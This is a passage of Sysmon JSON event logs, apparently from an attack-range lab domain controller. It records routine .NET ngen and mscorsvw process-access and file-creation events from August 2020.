{"EventTime":"2020-08-01 08:05:03","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6901,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:05:03.320\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-222F-5F25-0000-0010071E0B00}\r\nTargetProcessId: 656\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:05:03.320","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-222F-5F25-0000-0010071E0B00}","TargetProcessId":"656","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:05:05","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:05:03","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6902,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:05:03.367\r\nSourceProcessGUID: {41C8662E-21BC-5F25-0000-00100BBF0900}\r\nSourceProcessId: 3144\r\nSourceThreadId: 4488\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {41C8662E-21F3-5F25-0000-0010C6770A00}\r\nTargetProcessId: 3180\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+91db|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9168|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8fc5|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:05:03.367","SourceProcessGUID":"{41C8662E-21BC-5F25-0000-00100BBF0900}","SourceProcessId":"3144","SourceThreadId":"4488","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{41C8662E-21F3-5F25-0000-0010C6770A00}","TargetProcessId":"3180","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+91db|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9168|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8fc5|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:05:05","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:05:03","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6903,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:05:03.367\r\nSourceProcessGUID: {41C8662E-1F61-5F25-0000-0010E7420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 772\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {41C8662E-21F3-5F25-0000-0010C6770A00}\r\nTargetProcessId: 3180\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:05:03.367","SourceProcessGUID":"{41C8662E-1F61-5F25-0000-0010E7420000}","SourceProcessId":"648","SourceThreadId":"772","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{41C8662E-21F3-5F25-0000-0010C6770A00}","TargetProcessId":"3180","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 08:05:05","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:05:03","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6904,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:05:03.367\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-21F3-5F25-0000-0010C6770A00}\r\nTargetProcessId: 3180\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:05:03.367","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-21F3-5F25-0000-0010C6770A00}","TargetProcessId":"3180","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:05:05","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:05:03","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":11,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":2,"Task":11,"OpcodeValue":0,"RecordNumber":6905,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"File created:\r\nRuleName: DLL\r\nUtcTime: 2020-08-01 08:05:03.445\r\nProcessGuid: {41C8662E-222F-5F25-0000-001091210B00}\r\nProcessId: 3180\r\nImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nTargetFilename: C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Temp\\c6c-0\\Microsoft.GroupPolicy.ServerAdminTools.GPOAdminGrid.dll\r\nCreationUtcTime: 2020-08-01 08:05:03.445","Category":"File created (rule: FileCreate)","Opcode":"Info","RuleName":"DLL","UtcTime":"2020-08-01 08:05:03.445","ProcessGuid":"{41C8662E-222F-5F25-0000-001091210B00}","Image":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","TargetFilename":"C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Temp\\c6c-0\\Microsoft.GroupPolicy.ServerAdminTools.GPOAdminGrid.dll","CreationUtcTime":"2020-08-01 08:05:03.445","EventReceivedTime":"2020-08-01 08:05:05","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:05:03","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6906,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:05:03.460\r\nSourceProcessGUID: {41C8662E-21BC-5F25-0000-00100BBF0900}\r\nSourceProcessId: 3144\r\nSourceThreadId: 3780\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {41C8662E-21F3-5F25-0000-0010C27B0A00}\r\nTargetProcessId: 3672\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:05:03.460","SourceProcessGUID":"{41C8662E-21BC-5F25-0000-00100BBF0900}","SourceProcessId":"3144","SourceThreadId":"3780","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{41C8662E-21F3-5F25-0000-0010C27B0A00}","TargetProcessId":"3672","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:05:05","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:05:03","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6907,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:05:03.460\r\nSourceProcessGUID: {41C8662E-1F61-5F25-0000-0010E7420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 772\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {41C8662E-21F3-5F25-0000-0010C27B0A00}\r\nTargetProcessId: 3672\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:05:03.460","SourceProcessGUID":"{41C8662E-1F61-5F25-0000-0010E7420000}","SourceProcessId":"648","SourceThreadId":"772","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{41C8662E-21F3-5F25-0000-0010C27B0A00}","TargetProcessId":"3672","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 08:05:05","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:05:03","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6908,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:05:03.460\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-21F3-5F25-0000-0010C27B0A00}\r\nTargetProcessId: 3672\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:05:03.460","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-21F3-5F25-0000-0010C27B0A00}","TargetProcessId":"3672","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:05:05","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:05:03","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6909,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:05:03.492\r\nSourceProcessGUID: {41C8662E-21BC-5F25-0000-00100BBF0900}\r\nSourceProcessId: 3144\r\nSourceThreadId: 4488\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {41C8662E-222F-5F25-0000-0010A9280B00}\r\nTargetProcessId: 3300\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+91db|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9168|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8fc5|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 